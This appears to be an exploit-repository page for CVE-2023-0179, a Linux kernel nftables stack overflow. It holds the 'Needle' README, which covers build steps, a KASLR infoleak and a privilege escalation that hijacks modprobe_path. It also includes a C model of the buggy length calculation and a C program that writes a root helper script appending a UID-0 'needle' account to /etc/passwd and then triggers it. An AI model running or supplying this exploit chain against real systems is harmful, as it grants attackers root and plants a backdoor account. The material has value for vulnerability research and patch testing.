
CVE-2023-0179 PoC — Linux kernel input validation error vulnerability

Associated Vulnerability
Title: Linux kernel input validation error vulnerability (CVE-2023-0179)
Description: The Linux kernel is the kernel used by Linux, the open-source operating system of the Linux Foundation (USA). A security vulnerability exists in the Linux kernel. An attacker who exploits it can execute arbitrary code and escalate local privileges to root.
Readme
# Needle (CVE-2023-0179) exploit

This repository contains the exploit for my recently discovered vulnerability in the nftables subsystem, assigned CVE-2023-0179. It affects Linux kernel versions from 5.5 up to 6.2-rc3; the exploit was tested on 6.1.6.

The vulnerability details and writeup can be found on [oss-security](https://www.openwall.com/lists/oss-security/2023/01/13/2).

## Building instructions
Run `make needle` to build the `needle` executable.

`libmnl` and `libnftnl` are required for the build to succeed:
```bash
sudo apt-get install libmnl-dev libnftnl-dev
```

## Infoleak

The exploit enters an unprivileged user and network namespace and adds an `nft_payload` expression via the `rule_add_payload` function. When the rule is evaluated, the expression triggers the stack buffer overflow and overwrites the nftables registers (`struct nft_regs`) on the kernel stack.

The content is then retrieved with the following nft command:

`nft list map netdev mytable myset12`

The output leaks several addresses of kernel data structures (register contents that were filled from stack memory beyond the intended copy). Among them are a kernel instruction address, which is enough to derive the KASLR base, and the pointer to `regs` itself, which gives the location of the register file on the kernel stack.
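The two sections above rely on the same defect: the length that `nft_payload_copy_vlan()` hands to `memcpy()` underflows when a VLAN-tagged frame is read at an offset inside the synthesised 802.1Q header. The model below is an added userspace example, not code from this repository or from the kernel: the length arithmetic and the constants are reconstructed from the linked writeup and the pre-fix kernel source (the trailing `+ vlan_hlen` in the vulnerable subtraction should have been `- vlan_hlen`), and the 80-byte size assumed for `struct nft_regs` (20 32-bit registers) is an assumption to be checked against the target kernel. It shows, for a given `offset`/`len`, how many bytes the vulnerable code copies, how many of them land past the register file (the overflow used for the LPE) and how many are read from the stack beyond the 18-byte rebuilt header (the bytes that show up in the infoleak).

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Header lengths as in <linux/if_ether.h> and <linux/if_vlan.h>. */
#define ETH_HLEN       14                    /* dst MAC, src MAC, ethertype */
#define VLAN_HLEN       4                    /* 802.1Q TCI + inner ethertype */
#define VLAN_ETH_HLEN  (ETH_HLEN + VLAN_HLEN) /* 18 */

/* Assumption: struct nft_regs holds 20 u32 registers (NFT_REG32_NUM). */
#define NFT_REGS_BYTES (20 * 4)
/* The struct vlan_ethhdr rebuilt on the kernel stack is VLAN_ETH_HLEN bytes. */
#define VETH_BYTES     VLAN_ETH_HLEN

/* vlan_hlen is VLAN_HLEN only when the frame's ethertype is 802.1Q/802.1AD
 * and the requested offset lies inside the synthesised tag, [18, 22). */
static uint8_t vlan_hlen_for(int proto_is_vlan, uint8_t offset)
{
    if (proto_is_vlan && offset >= VLAN_ETH_HLEN &&
        offset < VLAN_ETH_HLEN + VLAN_HLEN)
        return VLAN_HLEN;
    return 0;
}

/* Bytes memcpy()'d from the rebuilt header into the registers by the
 * vulnerable code. Returns -1 when the header path is not taken at all. */
static int vuln_ethlen(int proto_is_vlan, uint8_t offset, uint8_t len)
{
    uint8_t vlan_hlen = vlan_hlen_for(proto_is_vlan, offset);
    uint8_t ethlen = len;

    if (offset >= VLAN_ETH_HLEN + vlan_hlen)
        return -1;                      /* rest is copied from the skb instead */
    if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
        ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;  /* BUG: wraps in u8 */
    return ethlen;
}

/* Same computation with the sign of vlan_hlen corrected, as in the fix. */
static int fixed_ethlen(int proto_is_vlan, uint8_t offset, uint8_t len)
{
    uint8_t vlan_hlen = vlan_hlen_for(proto_is_vlan, offset);
    uint8_t ethlen = len;

    if (offset >= VLAN_ETH_HLEN + vlan_hlen)
        return -1;
    if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
        ethlen -= offset + len - VLAN_ETH_HLEN - vlan_hlen;  /* never exceeds len */
    return ethlen;
}

/* Bytes written past the end of struct nft_regs when the destination is
 * 32-bit register index dreg (0..19). */
static int regs_overflow(int ethlen, unsigned dreg)
{
    int avail = NFT_REGS_BYTES - (int)dreg * 4;
    return ethlen > avail ? ethlen - avail : 0;
}

/* Bytes read from the stack beyond the rebuilt header: the source of the
 * infoleak once those register bytes are listed back from userspace. */
static int header_overread(int proto_is_vlan, uint8_t offset, int ethlen)
{
    int avail = VETH_BYTES + vlan_hlen_for(proto_is_vlan, offset) - offset;
    return ethlen > avail ? ethlen - avail : 0;
}

int main(void)
{
    /* Constructed cases: untagged in-header read, tagged reads at 18..21. */
    const struct { int vlan; uint8_t off, len; } cases[] = {
        {0, 16, 4}, {1, 18, 4}, {1, 19, 4}, {1, 21, 8},
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        int v = vuln_ethlen(cases[i].vlan, cases[i].off, cases[i].len);
        int f = fixed_ethlen(cases[i].vlan, cases[i].off, cases[i].len);
        printf("vlan=%d offset=%u len=%u: vulnerable copies %d bytes "
               "(%d past regs at dreg 4, %d read beyond the header); fixed copies %d\n",
               cases[i].vlan, cases[i].off, cases[i].len, v,
               regs_overflow(v, 4), header_overread(cases[i].vlan, cases[i].off, v), f);
    }
    return 0;
}
```

Only the tagged cases with `offset + len > 22` underflow; an untagged frame (`vlan_hlen == 0`) gets the same, correct length from both variants, which is why the bug survived as long as it did.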

## LPE

The exploit creates a new user account `needle:needle` with UID 0 by abusing the kernel's `modprobe_path` variable: once that string is overwritten, the root-privileged usermode helper the kernel spawns to load a module (for example on `execve()` of a file in an unknown binary format) runs an attacker-controlled script instead of `/sbin/modprobe`.

Enjoy root privileges.
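The userspace half of the `modprobe_path` technique, as an added example that is not taken from this exploit: it writes the helper script the kernel would run as root, writes a trigger file whose first four bytes match no binary-format handler, and executes the trigger. The file paths, the use of `openssl passwd -1` to hash the password, and the account line format are assumptions for this example. Nothing here elevates privileges on its own: with the stock `/sbin/modprobe` the kernel merely fails to load `binfmt-ffff`; only after the kernel write has redirected `modprobe_path` to the helper does the same `execve()` add the UID-0 account.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumed paths; the exploit's kernel write would point modprobe_path at HELPER_PATH. */
#define HELPER_PATH  "/tmp/needle_helper.sh"
#define TRIGGER_PATH "/tmp/needle_trigger"

/* Script run as root by the kernel's usermode helper. Assumes openssl(1) is
 * present to produce an MD5-crypt hash of the password "needle". */
static const char helper_script[] =
    "#!/bin/sh\n"
    "h=$(openssl passwd -1 needle)\n"
    "echo \"needle:$h:0:0:needle:/root:/bin/sh\" >> /etc/passwd\n";

/* Create path with the given mode and contents; 0 on success, -errno otherwise. */
static int write_file(const char *path, const void *buf, size_t n, mode_t mode)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, mode);
    if (fd < 0)
        return -errno;
    ssize_t w = write(fd, buf, n);
    int err = (w < 0) ? -errno : (w == (ssize_t)n ? 0 : -EIO);
    close(fd);
    return err;
}

static int write_helper(void)
{
    return write_file(HELPER_PATH, helper_script, sizeof helper_script - 1, 0755);
}

/* 0xff 0xff 0xff 0xff: not ELF, not "#!", and not printable. The kernel only
 * calls request_module("binfmt-%04x") for a non-printable magic, so a trigger
 * made of ASCII text would never reach modprobe_path. */
static int write_trigger(void)
{
    static const unsigned char bogus[4] = { 0xff, 0xff, 0xff, 0xff };
    return write_file(TRIGGER_PATH, bogus, sizeof bogus, 0755);
}

/* execve() the trigger in a child. No binfmt claims the file, so the kernel
 * asks the usermode helper for binfmt-ffff (as root) and then fails the exec
 * with ENOEXEC. Returns the child's errno, or -errno on fork/wait failure. */
static int run_trigger(void)
{
    pid_t pid = fork();
    if (pid < 0)
        return -errno;
    if (pid == 0) {
        char *const argv[] = { TRIGGER_PATH, NULL };
        char *const envp[] = { NULL };
        execve(TRIGGER_PATH, argv, envp);
        _exit(errno);                 /* reached only when execve() fails */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -errno;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    int err = write_helper();
    if (err == 0)
        err = write_trigger();
    if (err) {
        fprintf(stderr, "setup failed: %s\n", strerror(-err));
        return 1;
    }
    int rc = run_trigger();
    printf("execve(%s) -> %s\n", TRIGGER_PATH, rc > 0 ? strerror(rc) : "unexpected result");
    return 0;
}
```

Run it unprivileged before the kernel write as a sanity check: `execve` must come back with `ENOEXEC`, which proves the trigger takes the unknown-format path; a printable magic or a `noexec` mount (`EACCES`) would silently skip the helper.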

## Demo

[![asciicast](https://asciinema.org/a/mVTu420tWy8ocdFY70sWD9VLO.svg)](https://asciinema.org/a/mVTu420tWy8ocdFY70sWD9VLO)

## Credits
- David Bouman's `libnftnl` [implementation](https://github.com/pqlx/CVE-2022-1015) and detailed [blog post](https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016/)
File Snapshot

```text
[4.0K] /data/pocs/611a8649cd96dfedaa74aacc452dec5887abf461
├── [134K] config
├── [ 13K] exploit.c
├── [1.4K] exploit.h
├── [ 12K] helpers.c
├── [3.0K] helpers.h
├── [1.0K] LICENSE
├── [ 247] Makefile
├── [4.6K] needle.c
├── [1.6K] README.md
├── [1.1K] run.sh
└── [ 430] setup.sh

0 directories, 11 files
```